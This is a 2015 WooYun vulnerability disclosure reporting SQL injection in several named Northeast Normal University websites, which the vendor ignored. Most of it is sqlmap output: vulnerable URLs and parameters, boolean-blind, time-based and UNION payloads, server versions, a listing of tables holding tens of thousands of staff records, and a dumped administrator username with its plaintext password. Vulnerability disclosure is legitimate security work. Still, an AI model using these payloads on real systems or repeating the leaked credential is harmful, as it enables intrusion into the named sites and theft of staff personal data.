当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154840

漏洞标题:东北师范大学多学院存在sql注入

相关厂商:东北师范大学

漏洞作者: 路人甲

提交时间:2015-11-23 13:44

修复时间:2015-11-28 13:46

公开时间:2015-11-28 13:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

1.注入点:
http://wy.nenu.edu.cn/news/news.php?id=380
数据库:

sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=380 AND 5389=5389
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=380 AND (SELECT * FROM (SELECT(SLEEP(5)))qxko)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1528 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766271,0x6a596d615443536d5762,0x716b766b71),NULL--
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=380 AND 5389=5389
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=380 AND (SELECT * FROM (SELECT(SLEEP(5)))qxko)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1528 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766271,0x6a596d615443536d5762,0x716b766b71),NULL--
---
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] wydb


数据表:

Database: wydb
+-------------+---------+
| Table | Entries |
+-------------+---------+
| staff_info | 36002 |
| article | 272 |
| staff_admin | 218 |
| class | 6 |
| admin | 1 |
+-------------+---------+
Table: staff_info
[14 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| achievement | varchar(4000) |
| dept | char(20) |
| direction | char(50) |
| email | char(40) |
| id | int(6) |
| instruction | varchar(2000) |
| item | varchar(4000) |
| name | char(10) |
| picname | varchar(80) |
| resume | varchar(4000) |
| reward | varchar(4000) |
| tele | char(20) |
| title | char(10) |
| updatetime | time |
+-------------+---------------+


管理员表:

Table: admin
[3 columns]
+----------+------------+
| Column | Type |
+----------+------------+
| id | bigint(10) |
| password | char(50) |
| username | char(50) |
+----------+------------+
Table: admin
[1 entry]
+----+----------+--------------+
| id | username | password |
+----+----------+--------------+
| 1 | admin | qazxsw!@#$%^ |
+----+----------+--------------+

漏洞证明:

2.注入点:
http://chem.nenu.edu.cn/right.php?typeid=52
http://www5.nenu.edu.cn/professor/pro/yul/c_jbxx_new.php?id=127

sqlmap identified the following injection point(s) with a total of 387 HTTP(s) requests:
---
Parameter: typeid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: typeid=52 RLIKE (SELECT (CASE WHEN (5855=5855) THEN 52 ELSE 0x28 END))
---
web application technology: Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0


sqlmap identified the following injection point(s) with a total of 289 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=127 AND 6241=6241
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=127 AND 9843=BENCHMARK(5000000,MD5(0x6f53794f))
---
web server operating system: Linux Red Hat 9 or 8.0 (Psyche or Shrike)
web application technology: PHP 4.2.2, Apache 2.0.40
back-end DBMS: MySQL <5.0.11


3.东北师范大学文学院
http://chinese.nenu.edu.cn/show_news.php?id=1118&typeid=15

sqlmap identified the following injection point(s) with a total of 490 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1118 RLIKE (SELECT (CASE WHEN (3520=3520) THEN 1118 ELSE 0x28 END))&typeid=15
---
web application technology: Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0


东北师范大学信息网http://info.nenu.edu.cn/newsdetail.php?id=4113

sqlmap identified the following injection point(s) with a total of 81 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4113 AND 5789=5789
---
web server operating system: Linux Red Hat 9 or 8.0 (Psyche or Shrike)
web application technology: PHP 4.2.2, Apache 2.0.40
back-end DBMS: MySQL < 4.0.0

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 13:46

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无